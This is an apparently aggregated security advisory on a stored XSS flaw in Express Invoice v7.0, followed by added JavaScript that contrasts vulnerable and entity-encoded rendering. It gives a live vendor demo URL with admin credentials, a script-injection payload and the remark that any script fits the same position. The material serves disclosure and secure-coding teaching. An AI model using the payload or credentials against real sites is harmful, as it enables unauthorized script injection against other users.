Express Invoice - The Complete Billing Software v7.0 Stored XSS Injection

CVE: N/A
Category: CWE-79 (Cross-site Scripting)
Price: Unknown
Severity: High

Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-04-23

CVSS vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.02192
EPSS percentile (EPSSP): 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040204

Below is a copy:

Express Invoice - The Complete Billing Software v7.0 Stored XSS Injection
[*] :: Title: Express Invoice - The Complete Billing Software v7.0 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-23
[*] :: Software: Express Invoice - The Complete Billing Software v7.0
  
[?] :: Technical Details & Description:
# Express Invoice - The Complete Billing Software applies no filtering to data entered in its input fields, and the stored values are rendered back into pages without output encoding. An authenticated user can therefore store script in almost any field, and it executes in the browser of anyone who later views that record (stored XSS, CWE-79). The version tested is 7.0.

[?] :: Demo Website:
# https://codecanyon.net/item/express-invoice-with-stock-account-solutions/15467114
# Backend: http://billing.ultimatekode.com/demo/
# Login: admin, Password: 123456

[!] :: PoC Stored XSS Injection:
# http://billing.ultimatekode.com/demo/

[+] :: PoC [Stored XSS Injection]:
# Log in to the demo site for testing: http://billing.ultimatekode.com/demo/ (login / password: admin / 123456). The application has no validation or output encoding to prevent XSS injection, so the payload below can be saved in almost any input field in the interface and fires whenever the stored value is rendered.
# Sample payload: "><script>alert('QUIXSS')</script>
# The leading "> closes the value attribute and the surrounding tag the stored data is written into, so the <script> element that follows is parsed as real markup; the alert is only a visible marker, and the same position accepts any script.
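# The following is an added example, not code from the advisory above or from the Express Invoice code base. It shows why the payload works when a stored value is concatenated into an HTML attribute without encoding, the encoded rendering that stops it, and a small check a tester can run on a saved page to classify how the payload came back. The field name, the two render helpers and classifyReflection are assumptions made for illustration; only the payload is taken from the advisory.

```javascript
// Added example (assumption: the app concatenates stored values into HTML templates).
// Not the vendor's code; the field name and helper names are illustrative.

// Payload from the advisory.
const PAYLOAD = `"><script>alert('QUIXSS')</script>`;

// Vulnerable pattern: the stored input is pasted straight into a double-quoted
// attribute. The leading `">` in the payload closes the value attribute and the
// <input> tag, so the <script> element that follows is parsed as real markup.
function renderFieldVulnerable(fieldName, storedValue) {
  return `<input type="text" name="${fieldName}" value="${storedValue}">`;
}

// Entity-encode the five characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: every stored value is encoded for the context it lands in,
// so the same payload is displayed as literal text inside the field.
function renderFieldSafe(fieldName, storedValue) {
  return `<input type="text" name="${escapeHtml(fieldName)}" value="${escapeHtml(storedValue)}">`;
}

// Classify how a marker payload came back in a fetched page:
//   'raw'     the exact payload is present as markup (stored XSS confirmed)
//   'encoded' only an entity-encoded copy is present (output encoding in place)
//   'absent'  the value was dropped or altered beyond recognition
function classifyReflection(html, payload) {
  if (html.includes(payload)) return 'raw';
  if (html.includes(escapeHtml(payload))) return 'encoded';
  return 'absent';
}

// Constructed sample: what a customer-name field renders under each pattern.
const vulnerablePage = renderFieldVulnerable('customer_name', PAYLOAD);
const safePage = renderFieldSafe('customer_name', PAYLOAD);
console.log(vulnerablePage, '=>', classifyReflection(vulnerablePage, PAYLOAD));
console.log(safePage, '=>', classifyReflection(safePage, PAYLOAD));
```

# classifyReflection is a string check, not a parser: it is meant for confirming a marker payload across many fields quickly, and a 'raw' result should still be verified in a browser, while 'encoded' only says this one context was handled and says nothing about fields rendered into JavaScript or URL contexts.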
